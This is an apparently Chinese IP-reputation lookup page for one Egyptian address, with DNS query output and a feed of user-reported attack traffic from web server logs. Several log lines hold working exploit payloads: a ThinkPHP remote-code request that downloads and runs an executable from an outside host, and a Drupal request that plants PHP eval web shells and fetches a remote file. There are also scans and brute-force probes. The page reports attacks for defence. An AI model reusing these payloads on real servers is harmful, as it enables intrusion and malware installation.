必须是合法有效的IP地址, 可以是IPv4或者是IPv6, 例如127.0.0.1或者2001:DB8:0:0:8:800:200C:417A
基本信息:

城市(city): unknown

省份(region): unknown

国家(country): Egypt

运营商(isp): unknown

主机名(hostname): unknown

机构(organization): unknown

使用类型(Usage Type): unknown

用户上报:
暂无关于此IP的讨论, 沙发请点上方按钮
相同子网IP讨论:
暂无关于此IP所属子网相关IP的讨论.
WHOIS信息:
b
DIG信息:
; <<>> DiG 9.10.3-P4-Ubuntu <<>> 45.101.65.42
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 17345
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;45.101.65.42.			IN	A

;; AUTHORITY SECTION:
.			256	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2023032902 1800 900 604800 86400

;; Query time: 16 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Thu Mar 30 04:37:45 CST 2023
;; MSG SIZE  rcvd: 105
HOST信息:
Host 42.65.101.45.in-addr.arpa. not found: 3(NXDOMAIN)
NSLOOKUP信息:
Server:		183.60.83.19
Address:	183.60.83.19#53

** server can't find 42.65.101.45.in-addr.arpa: NXDOMAIN
相关IP信息:
最新评论:
IP 类型 评论内容 时间
58.251.121.185 attack
58.251.121.185 - - [10/Apr/2019:15:04:42 +0800] "GET //data/cache/asd.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117"
58.251.121.185 - - [10/Apr/2019:15:04:42 +0800] "GET //data/cache/asd.php HTTP/1.1" 404 209 "http://ipinfo.asytech.cn//data/cache/asd.php" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117"
2019-04-10 15:10:14
118.25.145.186 attack
118.25.145.186 - - [08/Apr/2019:16:46:35 +0800] "GET /public/index.php?s=index/think\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/hchqnxhwaxuxfid24711.exe');start%20C:/Windows/temp/hchqnxhwaxuxfid24711.exe HTTP/1.1" 400 682 "http://118.25.52.138:443/public/index.php?s=index/think\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/hchqnxhwaxuxfid24711.exe');start C:/Windows/temp/hchqnxhwaxuxfid24711.exe" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
118.25.145.186 - - [08/Apr/2019:16:46:35 +0800] "GET /public/index.php?s=/index/\\x5Cthink\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^>hydra.php HTTP/1.1" 400 682 "http://118.25.52.138:443/public/index.php?s=/index/\\x5Cthink\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^>hydra.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
118.25.145.186 - - [08/Apr/2019:16:46:35 +0800] "GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/hchqnxhwaxuxfid24711.exe');start%20C:/Windows/temp/hchqnxhwaxuxfid24711.exe HTTP/1.1" 400 682 "http://118.25.52.138:443/public/hydra.php?xcmd=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/hchqnxhwaxuxfid24711.exe');start C:/Windows/temp/hchqnxhwaxuxfid24711.exe" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
2019-04-08 16:47:25
113.200.201.130 attack
113.200.201.130 - - [08/Apr/2019:12:07:26 +0800] "POST /up.php HTTP/1.1" 404 499 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
113.200.201.130 - - [08/Apr/2019:12:07:26 +0800] "POST /test123.php HTTP/1.1" 404 504 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
113.200.201.130 - - [08/Apr/2019:12:07:26 +0800] "POST /test123.php HTTP/1.1" 404 504 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
113.200.201.130 - - [08/Apr/2019:12:07:27 +0800] "POST /fb.php HTTP/1.1" 404 499 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
113.200.201.130 - - [08/Apr/2019:12:07:27 +0800] "POST /paylog.php HTTP/1.1" 404 503 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
113.200.201.130 - - [08/Apr/2019:12:07:27 +0800] "POST /paylog.php HTTP/1.1" 404 503 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
2019-04-08 12:08:33
123.190.152.140 attack
123.190.152.140 - - [14/Apr/2019:09:56:22 +0800] "GET /mgw.htm?operationType=com.cars.otsmobile.queryLeftTicket&requestData=%5B%7B\\x22train_date\\x22%3A\\x2220181231\\x22%2C\\x22purpose_codes\\x22%3A\\x2200\\x22%2C\\x22from_station\\x22%3A\\x22BJP\\x22%2C\\x22to_station\\x22%3A\\x22SHH\\x22%2C\\x22station_train_code\\x22%3A\\x22\\x22%2C\\x22start_time_begin\\x22%3A\\x220000\\x22%2C\\x22start_time_end\\x22%3A\\x222400\\x22%2C\\x22train_headers\\x22%3A\\x22QB%23\\x22%2C\\x22train_flag\\x22%3A\\x22\\x22%2C\\x22seat_type\\x22%3A\\x220\\x22%2C\\x22seatBack_Type\\x22%3A\\x22\\x22%2C\\x22ticket_num\\x22%3A\\x22\\x22%2C\\x22dfpStr\\x22%3A\\x22\\x22%2C\\x22baseDTO\\x22%3A%7B\\x22check_code\\x22%3A\\x22d38a201f2de926ce0686aedfdcf2de68\\x22%2C\\x22device_no\\x22%3A\\x22WtaHBzID7ZQDADJh05y5LLpd\\x22%2C\\x22mobile_no\\x22%3A\\x22\\x22%2C\\x22os_type\\x22%3A\\x22a\\x22%2C\\x22time_str\\x22%3A\\x2220181030152947\\x22%2C\\x22version_no\\x22%3A\\x224.1.9\\x22%7D%7D%5D&ts=1540884587652&sign=37b8ebe6406579e4fb2ac8c9038eab37 HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"
2019-04-14 10:04:14
120.92.90.154 botsattack
120.92.90.154 - - [17/Apr/2019:00:04:34 +0000] "POST /public/index.php HTTP/1.1" 404 15604 "-" "python-requests/2.21.0"
120.92.90.154 - - [17/Apr/2019:00:04:35 +0000] "GET /public/gqxuracc.php HTTP/1.1" 404 15604 "-" "python-requests/2.21.0"
120.92.90.154 - - [17/Apr/2019:00:04:35 +0000] "POST /public/index.php HTTP/1.1" 404 15604 "-" "python-requests/2.21.0"
120.92.90.154 - - [17/Apr/2019:00:04:35 +0000] "GET /public/gqxuracc.php HTTP/1.1" 404 15604 "-" "python-requests/2.21.0"
2019-04-17 08:12:27
54.242.155.91 attack
54.242.155.91 - - [14/Apr/2019:19:26:59 +0800] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 301 194 "-" "ZmEu"
54.242.155.91 - - [14/Apr/2019:19:26:59 +0800] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 301 194 "-" "ZmEu"
54.242.155.91 - - [14/Apr/2019:19:26:59 +0800] "GET /myadmin/scripts/setup.php HTTP/1.1" 301 194 "-" "ZmEu"
54.242.155.91 - - [14/Apr/2019:19:26:59 +0800] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 301 194 "-" "ZmEu"
54.242.155.91 - - [14/Apr/2019:19:26:59 +0800] "GET /pma/scripts/setup.php HTTP/1.1" 301 194 "-" "ZmEu"
54.242.155.91 - - [14/Apr/2019:19:26:59 +0800] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 301 194 "-" "ZmEu"
54.242.155.91 - - [14/Apr/2019:19:26:59 +0800] "GET  HTTP/1.1" 400 182 "-" "-"
2019-04-14 19:37:25
35.200.107.73 attack
35.200.107.73 - - [16/Apr/2019:21:17:31 +0800] "GET //blog/wp-includes/wlwmanifest.xml HTTP/1.1" 404 232 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"
35.200.107.73 - - [16/Apr/2019:21:17:31 +0800] "GET //wordpress/wp-includes/wlwmanifest.xml HTTP/1.1" 404 232 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"
35.200.107.73 - - [16/Apr/2019:21:17:31 +0800] "GET //wp/wp-includes/wlwmanifest.xml HTTP/1.1" 404 232 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"
2019-04-16 21:34:35
192.99.15.141 attack
192.99.15.141 - - [10/Apr/2019:21:48:58 +0800] "GET /?q=user%2Fpassword&name%5B%23post_render%5D%5B%5D=passthru&name%5B%23type%5D=markup&name%5B%23markup%5D=echo+%27Vuln%21%21+patch+it+Now%21%27+%3E+vuln.htm%3B+echo+%27Vuln%21%21%3C%3Fphp+%40eval%28%24_POST%5B%27pass%27%5D%29+%3F%3E%27%3E+sites%2Fdefault%2Ffiles%2Fvuln.php%3B+echo+%27Vuln%21%21%3C%3Fphp+%40eval%28%24_POST%5B%27pass%27%5D%29+%3F%3E%27%3E+vuln.php%3B+cd+sites%2Fdefault%2Ffiles%2F%3B+echo+%27AddType+application%2Fx-httpd-php+.jpg%27+%3E+.htaccess%3B+wget+%27http%3A%2F%2F40k.waszmann.de%2FDeutsch%2Fimages%2Fup.php%27 HTTP/1.1" 200 29740 "http://www.google.com.hk" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36"
2019-04-11 06:38:05
42.156.254.59 bots
应该是yisou爬虫,但是不知道为啥400
42.156.254.59 - - [09/Apr/2019:14:25:31 +0800] "GET /wp-content/themes/twentyfifteen/genericons/genericons.css?ver=3.2 HTTP/1.1" 400 3429 "-" "-"
42.156.254.57 - - [09/Apr/2019:14:25:31 +0800] "GET /wp-content/plugins/wp-quicklatex/css/quicklatex-format.css?ver=5.1.1 HTTP/1.1" 400 3429 "-" "-"
42.156.254.59 - - [09/Apr/2019:14:25:31 +0800] "GET /wp-includes/css/dist/block-library/style.min.css?ver=5.1.1 HTTP/1.1" 400 3429 "-" "-"
42.156.254.60 - - [09/Apr/2019:14:25:32 +0800] "GET /wp-content/themes/twentyfifteen-child/style.css?ver=5.1.1 HTTP/1.1" 400 3429 "-" "-"
2019-04-09 14:46:10
180.97.35.149 bots
不是正常流量
180.97.35.149 - - [09/Apr/2019:06:37:37 +0800] "GET / HTTP/1.1" 301 194 "http://www.baidu.com/s?wd=widetme" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0"
180.97.35.164 - - [09/Apr/2019:06:37:38 +0800] "GET / HTTP/1.1" 200 3259 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0"
180.97.35.164 - - [09/Apr/2019:06:37:38 +0800] "GET /static/bootstrap/css/bootstrap.min.css HTTP/1.1" 200 144877 "https://ipinfo.asytech.cn/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0"
2019-04-09 06:44:15
5.188.115.64 attack
端口扫描brute-force
2019-04-16 07:05:55
1.20.151.73 attack
1.20.151.73 - - [13/Apr/2019:04:10:01 +0800] "GET /phpMyAdmins/index.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0
.2623.105 Safari/537.36"
1.20.151.73 - - [13/Apr/2019:04:10:01 +0800] "GET /phpMyAdmin._/index.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.
0.2623.105 Safari/537.36"
1.20.151.73 - - [13/Apr/2019:04:10:01 +0800] "GET /phpmyadmin2222/index.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/4
9.0.2623.105 Safari/537.36"
1.20.151.73 - - [13/Apr/2019:04:10:01 +0800] "GET /php2MyAdmin/index.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0
.2623.105 Safari/537.36"
2019-04-13 06:21:32
46.229.206.135 attack
46.229.206.135 - - [10/Apr/2019:08:58:54 +0800] "POST https://www.eznewstoday.com/wp-login.php?redirect_to=https%3A%2F%2Fwww.eznewstoday.com%2Fwp-admin%2F&reauth=1 HTTP/1.1" 200 7150 "https://www.eznewstoday.com/wp-login.php?redirect_to=https%3A%2F%2Fwww.eznewstoday.com%2Fwp-admin%2F&reauth=1" "Mozilla/5.0 (Windows NT 5.0) AppleWebKit/533.90.37 (KHTML, like Gecko) Version/5.3.8 Safari/531.73"
2019-04-10 09:00:42
208.100.26.230 attack
208.100.26.230 - - [13/Apr/2019:07:32:55 +0800] "GET / HTTP/1.1" 301 194 "-" "-"
208.100.26.230 - - [13/Apr/2019:07:32:55 +0800] "GET /HNAP1 HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36"
208.100.26.230 - - [13/Apr/2019:07:32:55 +0800] "GET / HTTP/1.0" 301 194 "-" "-"
208.100.26.230 - - [13/Apr/2019:07:32:56 +0800] "HEAD / HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36"
208.100.26.230 - - [13/Apr/2019:07:32:56 +0800] "GET /evox/about HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36"
208.100.26.230 - - [13/Apr/2019:07:32:56 +0800] "POST /sdk HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36"
208.100.26.230 - - [13/Apr/2019:07:32:56 +0800] "GET / HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36"
2019-04-13 07:33:37
104.248.39.213 attack
104.248.39.213 - - [14/Apr/2019:21:20:52 +0800] "POST /GponForm/diag_Form?images/ HTTP/1.1" 400 182 "-" "Hello, World"
2019-04-14 21:21:51

最近上报的IP列表

255.197.233.16 107.100.174.91 1.223.115.27 110.152.246.68
111.39.173.109 116.170.45.138 180.55.118.27 153.55.53.7
226.60.160.151 50.177.109.115 171.224.178.93 15.165.140.140
76.215.43.169 44.79.8.163 9.215.165.161 152.33.105.235
90.214.239.176 177.228.167.105 101.115.142.207 93.140.143.77